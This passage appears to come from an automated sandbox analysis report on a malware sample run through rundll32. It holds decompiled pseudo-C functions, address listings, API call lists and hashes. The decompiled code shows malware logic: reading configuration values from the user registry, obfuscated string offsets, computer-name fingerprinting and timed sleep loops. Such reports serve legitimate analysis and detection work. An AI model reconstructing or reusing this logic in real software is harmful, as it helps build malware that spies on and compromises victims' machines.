						_t81 = E04C074B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E04C0147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E04C0147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E04C0568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x4c0d260 & 0x00000001) == 0) {
							L14:
							E04C06E92(_t81, _v60, _v56,  *0x4c0d270, 0);
							_t81 = E04C06737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E04C072F2( &_v84, 0);
							}
							E04C0147E(_v60);
							goto L17;
						}
						_t67 =  *0x4c0d2a4; // 0x97a5a8
						_t18 = _t67 + 0x4c0e823; // 0x65696c43
						_t70 = E04C0A5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E04C074B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E04C0147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x04c06ce9
                                          0x04c06ced
                                          0x04c06cf4
                                          0x04c06cfc
                                          0x04c06cfd
                                          0x04c06cfe
                                          0x04c06cff
                                          0x04c06d00
                                          0x04c06d01
                                          0x04c06d09
                                          0x04c06d15
                                          0x04c06d17
                                          0x04c06d1d
                                          0x04c06e86
                                          0x04c06e87
                                          0x04c06e8f
                                          0x04c06e8f
                                          0x04c06d2f
                                          0x04c06d37
                                          0x04c06e78
                                          0x04c06e79
                                          0x04c06e7d
                                          0x00000000
                                          0x04c06e7d
                                          0x04c06d4a
                                          0x04c06d4c
                                          0x04c06d4c
                                          0x04c06d58
                                          0x04c06d5d
                                          0x04c06d63
                                          0x04c06e66
                                          0x00000000
                                          0x04c06d69
                                          0x04c06d69
                                          0x04c06d6e
                                          0x04c06d77
                                          0x04c06d7c
                                          0x04c06d85
                                          0x04c06dac
                                          0x04c06d87
                                          0x04c06da1
                                          0x04c06da3
                                          0x04c06da3
                                          0x04c06daf
                                          0x04c06e59
                                          0x04c06e5d
                                          0x04c06e67
                                          0x04c06e67
                                          0x04c06e6d
                                          0x04c06e6f
                                          0x04c06e6f
                                          0x00000000
                                          0x04c06db5
                                          0x04c06dbc
                                          0x04c06e01
                                          0x04c06e14
                                          0x04c06e2d
                                          0x04c06e31
                                          0x04c06e37
                                          0x04c06e3f
                                          0x04c06e4e
                                          0x04c06e4e
                                          0x04c06e54
                                          0x00000000
                                          0x04c06e54
                                          0x04c06dbe
                                          0x04c06dc3
                                          0x04c06dcc
                                          0x04c06dd1
                                          0x04c06dd5
                                          0x04c06dfc
                                          0x04c06dd7
                                          0x04c06de7
                                          0x04c06df1
                                          0x04c06df3
                                          0x04c06df3
                                          0x04c06dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c06dff
                                          0x04c06daf

                                          APIs
                                          • memset.NTDLL ref: 04C06CED
                                            • Part of subcall function 04C04814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04C06D15,00410025,00000005,?,00000000), ref: 04C04825
                                            • Part of subcall function 04C04814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04C04842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04C06D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04C04AB5), ref: 04C06D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 4e2c1bbc83c830b3dde2cfef79160f60ac6e40a9308d31dea4c8bcb8d52e185f
                                          • Instruction ID: 7f09d1925678d8e6864b52e94a54f9cf8e6b525eee26716eaf60e6d1c6554613
                                          • Opcode Fuzzy Hash: 4e2c1bbc83c830b3dde2cfef79160f60ac6e40a9308d31dea4c8bcb8d52e185f
                                          • Instruction Fuzzy Hash: 5F41B372204315AFE710EFA4DC80D6FB7EEEF44708F04892ABA95D7190D671EE149B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C04FFA, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 314 4c04ffa-4c0503c 316 4c05042-4c0504b 314->316 317 4c050c3-4c050c9 314->317 318 4c0508c-4c0508f 316->318 319 4c0504d-4c0505e SysAllocString 316->319 322 4c05091-4c050a1 SysAllocString 318->322 323 4c050ed 318->323 320 4c05060-4c05067 319->320 321 4c05069-4c05081 319->321 325 4c050b5-4c050b8 320->325 331 4c05085-4c0508a 321->331 326 4c050a3 322->326 327 4c050cc-4c050eb 322->327 324 4c050ef-4c050f2 323->324 329 4c050f4-4c05101 324->329 330 4c050aa-4c050ac 324->330 325->317 328 4c050ba-4c050bd SysFreeString 325->328 326->330 327->324 328->317 329->317 330->325 333 4c050ae-4c050af SysFreeString 330->333 331->318 331->325 333->325
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04C05057
                                          • SysAllocString.OLEAUT32(04C0A6F4), ref: 04C0509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C050AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C050BD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 955d462eaed6f4d290d6ff4ee463462591ddb756fe639a093ea9088a61dbbf37
                                          • Instruction ID: 834ac53e1faff6d52b67b3a4c9aadee2c9c448aefc0fc02555e73b39e7d835e7
                                          • Opcode Fuzzy Hash: 955d462eaed6f4d290d6ff4ee463462591ddb756fe639a093ea9088a61dbbf37
                                          • Instruction Fuzzy Hash: 96311F76900209FFDB04DF98D8C49AE7BB9FF48304B11846EF90697250E775AA81CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C090A1, Relevance: 6.0, APIs: 4, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 334 4c090a1-4c090b7 HeapCreate 335 4c090b9-4c090bc 334->335 336 4c090be-4c090d4 GetTickCount call 4c06a7f 334->336 337 4c0911c 335->337 336->337 340 4c090d6-4c090d7 336->340 341 4c090d8-4c09100 SwitchToThread call 4c01c04 Sleep 340->341 344 4c09102-4c0910b call 4c09511 341->344 347 4c09117 call 4c04908 344->347 348 4c0910d 344->348 347->337 348->347
                                          C-Code - Quality: 100%
                                          			E04C090A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4c0d238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x4c0d1a8 = GetTickCount();
				_t7 = E04C06A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E04C01C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E04C09511(_t15) != 0) {
						 *0x4c0d260 = 1; // executed
					}
					_t13 = E04C04908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x04c090a1
                                          0x04c090aa
                                          0x04c090b0
                                          0x04c090b7
                                          0x04c090bb
                                          0x00000000
                                          0x04c090bb
                                          0x04c090c8
                                          0x04c090cd
                                          0x04c090d4
                                          0x04c090d8
                                          0x04c090e4
                                          0x04c090e8
                                          0x04c090f7
                                          0x04c090fd
                                          0x04c0910b
                                          0x04c0910d
                                          0x04c0910d
                                          0x04c09117
                                          0x00000000
                                          0x04c09117
                                          0x04c0911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04C06F11,?), ref: 04C090AA
                                          • GetTickCount.KERNEL32 ref: 04C090BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 04C090D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 04C090F7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: e3cd0c65597875323aaa2fab4e328191d6e541ab693c1a0a9c48d1f660043512
                                          • Instruction ID: ded1a9bb436cb5b426125515fbdba63c8f2b8977a11529cc07c21f46a5b0997a
                                          • Opcode Fuzzy Hash: e3cd0c65597875323aaa2fab4e328191d6e541ab693c1a0a9c48d1f660043512
                                          • Instruction Fuzzy Hash: E1F0C2B9644200AAE7107BB49C48B5A3AAAEB4475DF028121EA05D21C1EB38ED80DA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C068CF, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 4c068cf-4c068e9 call 4c09138 353 4c068eb 350->353 354 4c068ee-4c06907 call 4c01b13 350->354 353->354 356 4c0690c-4c06910 354->356 357 4c06916-4c06930 StrToIntExW 356->357 358 4c069cf-4c069d4 356->358 361 4c06936-4c06952 call 4c05fcb 357->361 362 4c069bf-4c069c1 357->362 359 4c069d6 call 4c0568a 358->359 360 4c069db-4c069e1 358->360 359->360 363 4c069c2-4c069cd HeapFree 361->363 367 4c06954-4c0696d call 4c075e7 361->367 362->363 363->358 370 4c0698f-4c069bd call 4c01bc1 HeapFree 367->370 371 4c0696f-4c06976 367->371 370->363 371->370 372 4c06978-4c0698a call 4c075e7 371->372 372->370
                                          C-Code - Quality: 100%
                                          			E04C068CF() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E04C09138(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4c0d2a4; // 0x97a5a8
				_t4 = _t24 + 0x4c0ede0; // 0x5589388
				_t5 = _t24 + 0x4c0ed88; // 0x4f0053
				_t26 = E04C01B13( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4c0d2a4; // 0x97a5a8
						_t11 = _t32 + 0x4c0edd4; // 0x558937c
						_t48 = _t11;
						_t12 = _t32 + 0x4c0ed88; // 0x4f0053
						_t51 = E04C05FCB(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x4c0d2a4; // 0x97a5a8
							_t13 = _t35 + 0x4c0ea59; // 0x30314549
							if(E04C075E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0x4c0d25c - 6;
								if( *0x4c0d25c <= 6) {
									_t42 =  *0x4c0d2a4; // 0x97a5a8
									_t15 = _t42 + 0x4c0ec3a; // 0x52384549
									E04C075E7(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x4c0d2a4; // 0x97a5a8
							_t17 = _t38 + 0x4c0ee18; // 0x55893c0
							_t18 = _t38 + 0x4c0edf0; // 0x680043
							_t45 = E04C01BC1(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x4c0d238, 0, _t51);
						}
					}
					HeapFree( *0x4c0d238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E04C0568A(_t53);
				}
				return _t45;
			}

















                                          0x04c068df
                                          0x04c068e2
                                          0x04c068e9
                                          0x04c068eb
                                          0x04c068eb
                                          0x04c068ee
                                          0x04c068f3
                                          0x04c068fa
                                          0x04c06907
                                          0x04c0690c
                                          0x04c06910
                                          0x04c0691e
                                          0x04c0692c
                                          0x04c06930
                                          0x04c069c1
                                          0x04c069c1
                                          0x04c06936
                                          0x04c06936
                                          0x04c0693b
                                          0x04c0693b
                                          0x04c06942
                                          0x04c0694e
                                          0x04c06950
                                          0x04c06952
                                          0x04c06954
                                          0x04c0695b
                                          0x04c0696d
                                          0x04c0696f
                                          0x04c06976
                                          0x04c06978
                                          0x04c0697f
                                          0x04c0698a
                                          0x04c0698a
                                          0x04c06976
                                          0x04c0698f
                                          0x04c06994
                                          0x04c0699b
                                          0x04c069b9
                                          0x04c069bb
                                          0x04c069bb
                                          0x04c06952
                                          0x04c069cd
                                          0x04c069cd
                                          0x04c069cf
                                          0x04c069d4
                                          0x04c069d6
                                          0x04c069d6
                                          0x04c069e1

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05589388,00000000,?,7519F710,00000000,7519F730), ref: 04C0691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055893C0,?,00000000,30314549,00000014,004F0053,0558937C), ref: 04C069BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C09C10), ref: 04C069CD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 2e85f07c4962cc9fb805fdfb18ca34cbec5f944ab7ab96bda95769b4aea117f1
                                          • Instruction ID: 1cfed681188aae38b3af1abf98d20d51f31d2dda8d24cc44234852aa96b6a2e8
                                          • Opcode Fuzzy Hash: 2e85f07c4962cc9fb805fdfb18ca34cbec5f944ab7ab96bda95769b4aea117f1
                                          • Instruction Fuzzy Hash: 9831B336A00108BFEB10EFD4DD84EAA7BBEEF04714F0680A5B605AB190D770EE54EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C09F11, Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 376 4c09f11-4c09f39 377 4c09f59-4c09f61 RtlAllocateHeap 376->377 378 4c09f3b-4c09f43 RtlAllocateHeap 376->378 379 4c09f63-4c09f70 call 4c0514f 377->379 380 4c09f79-4c09f7b 377->380 378->380 381 4c09f45-4c09f52 call 4c01754 378->381 386 4c09f75-4c09f77 379->386 384 4c09f7c-4c09f7e 380->384 385 4c09f57 381->385 387 4c09f80-4c09fa1 call 4c07cf7 call 4c060cf 384->387 388 4c09fbc 384->388 385->386 386->384 394 4c09fa3-4c09fb6 call 4c06106 HeapFree 387->394 395 4c09fcb-4c09fdc 387->395 389 4c09fc2-4c09fc8 388->389 394->388 395->389 396 4c09fde-4c09fe5 395->396 396->389
                                          C-Code - Quality: 58%
                                          			E04C09F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0x4c0d2a4; // 0x97a5a8
				_push(0x800);
				_push(0);
				_push( *0x4c0d238);
				_t1 = _t43 + 0x4c0e791; // 0x6976612e
				_t44 = _t1;
				if( *0x4c0d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x4c0d24c =  *0x4c0d24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04C07CF7(_a4, _t41);
						_t19 = E04C060CF(_t41, _t41, _t46);
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x4c0d24c < 5) {
								 *0x4c0d24c =  *0x4c0d24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E04C06106();
						HeapFree( *0x4c0d238, 0, _t41);
						goto L10;
					}
					_t25 = E04C0514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t25 = E04C01754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}












                                          0x04c09f11
                                          0x04c09f11
                                          0x04c09f14
                                          0x04c09f15
                                          0x04c09f1f
                                          0x04c09f26
                                          0x04c09f2b
                                          0x04c09f2d
                                          0x04c09f33
                                          0x04c09f33
                                          0x04c09f39
                                          0x04c09f61
                                          0x04c09f79
                                          0x04c09f7b
                                          0x04c09f7c
                                          0x04c09f7e
                                          0x04c09fbc
                                          0x04c09fbc
                                          0x04c09fc2
                                          0x04c09fc8
                                          0x04c09fc8
                                          0x04c09f80
                                          0x04c09f86
                                          0x04c09f89
                                          0x04c09f98
                                          0x04c09f9a
                                          0x04c09fa1
                                          0x04c09fd5
                                          0x04c09fda
                                          0x04c09fdc
                                          0x04c09fde
                                          0x04c09fde
                                          0x00000000
                                          0x04c09fdc
                                          0x04c09fa3
                                          0x04c09fa8
                                          0x04c09fb6
                                          0x00000000
                                          0x04c09fb6
                                          0x04c09f70
                                          0x04c09f75
                                          0x04c09f75
                                          0x00000000
                                          0x04c09f75
                                          0x04c09f43
                                          0x00000000
                                          0x00000000
                                          0x04c09f52
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04C09F3B
                                            • Part of subcall function 04C01754: GetTickCount.KERNEL32 ref: 04C01768
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C017B8
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C017D5
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C01801
                                            • Part of subcall function 04C01754: HeapFree.KERNEL32(00000000,?), ref: 04C01813
                                            • Part of subcall function 04C01754: wsprintfA.USER32 ref: 04C01834
                                            • Part of subcall function 04C01754: HeapFree.KERNEL32(00000000,?), ref: 04C01844
                                            • Part of subcall function 04C01754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C01872
                                            • Part of subcall function 04C01754: GetTickCount.KERNEL32 ref: 04C01883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04C09F59
                                          • HeapFree.KERNEL32(00000000,?,?,?,04C09C62,00000002,?,?,?,?), ref: 04C09FB6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 32b509ebdfa6ac673f7c939685f0942581916c68518138407bb743231cb11cea
                                          • Instruction ID: 5f67122fdb717929984799d0203b358978f43215a06cd03e20a7e820b026daab
                                          • Opcode Fuzzy Hash: 32b509ebdfa6ac673f7c939685f0942581916c68518138407bb743231cb11cea
                                          • Instruction Fuzzy Hash: 6E217FB9201205EBEB15DFA9D840BAA77ADEB48348F118015F90297281DB74FE85DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0642C, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 4c0642c-4c06452 401 4c06520-4c06526 399->401 402 4c06458-4c0646c call 4c04ffa 399->402 404 4c06471-4c06475 402->404 405 4c06517-4c0651c 404->405 406 4c0647b-4c06480 404->406 405->401 407 4c06482-4c06485 406->407 408 4c06498-4c0649a 406->408 407->408 409 4c06487-4c06496 407->409 408->405 410 4c0649c-4c064c2 408->410 409->408 413 4c064f0-4c064f5 410->413 414 4c064c4-4c064d0 call 4c05103 410->414 416 4c064f7-4c064f9 413->416 417 4c064fd-4c06506 413->417 414->413 421 4c064d2-4c064d7 414->421 416->417 419 4c06508-4c0650b SysFreeString 417->419 420 4c0650d-4c06510 417->420 419->420 420->405 422 4c06512-4c06515 SysFreeString 420->422 421->413 423 4c064d9-4c064dc 421->423 422->405 423->413 424 4c064de-4c064ee 423->424 424->413
                                          C-Code - Quality: 75%
                                          			E04C0642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04C04FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4c0d2a4; // 0x97a5a8
						_t20 = _t68 + 0x4c0e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04C05103(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                          0x04c06432
                                          0x04c06435
                                          0x04c06445
                                          0x04c0644e
                                          0x04c06452
                                          0x04c06520
                                          0x04c06526
                                          0x04c06526
                                          0x04c0646c
                                          0x04c06471
                                          0x04c06475
                                          0x04c0647b
                                          0x04c06480
                                          0x04c06487
                                          0x04c06496
                                          0x04c06496
                                          0x04c0649a
                                          0x04c0649c
                                          0x04c064a8
                                          0x04c064b3
                                          0x04c064be
                                          0x04c064c2
                                          0x04c064cc
                                          0x04c064d0
                                          0x04c064d2
                                          0x04c064d7
                                          0x04c064de
                                          0x04c064ee
                                          0x04c064ee
                                          0x04c064d7
                                          0x04c064d0
                                          0x04c064f0
                                          0x04c064f5
                                          0x04c064fa
                                          0x04c064fa
                                          0x04c064fd
                                          0x04c06506
                                          0x04c0650b
                                          0x04c0650b
                                          0x04c06510
                                          0x04c06515
                                          0x04c06515
                                          0x04c06510
                                          0x04c0649a
                                          0x04c06517
                                          0x04c0651d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04C04FFA: SysAllocString.OLEAUT32(80000002), ref: 04C05057
                                            • Part of subcall function 04C04FFA: SysFreeString.OLEAUT32(00000000), ref: 04C050BD
                                          • SysFreeString.OLEAUT32(?), ref: 04C0650B
                                          • SysFreeString.OLEAUT32(04C0A6F4), ref: 04C06515
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 0e48a698df84a9c4ed80c51ffbb76e9487307b3f29f9e1d17551baf83bfe133d
                                          • Instruction ID: 1e59af532f394006810a758c38c5cedebbb99b4bd68c106d02f2e2646dbab2a1
                                          • Opcode Fuzzy Hash: 0e48a698df84a9c4ed80c51ffbb76e9487307b3f29f9e1d17551baf83bfe133d
                                          • Instruction Fuzzy Hash: 01317C75600159AFCB11DFA8C888C9FBB7AFFC97447118658F8069B254E331EDA1DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C073E9, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04C073E9(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04C058BE(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04C0147E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                          0x04c073ee
                                          0x04c073f9
                                          0x04c073fb
                                          0x04c07401
                                          0x04c07403
                                          0x04c07408
                                          0x04c07411
                                          0x04c07415
                                          0x04c0741e
                                          0x04c07422
                                          0x04c07431
                                          0x04c07424
                                          0x04c07425
                                          0x04c0742a
                                          0x04c0742a
                                          0x04c07422
                                          0x04c07415
                                          0x04c0743a

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04C051DC,7519F710,00000000,?,?,04C051DC), ref: 04C07401
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04C051DC,04C051DD,?,?,04C051DC), ref: 04C0741E
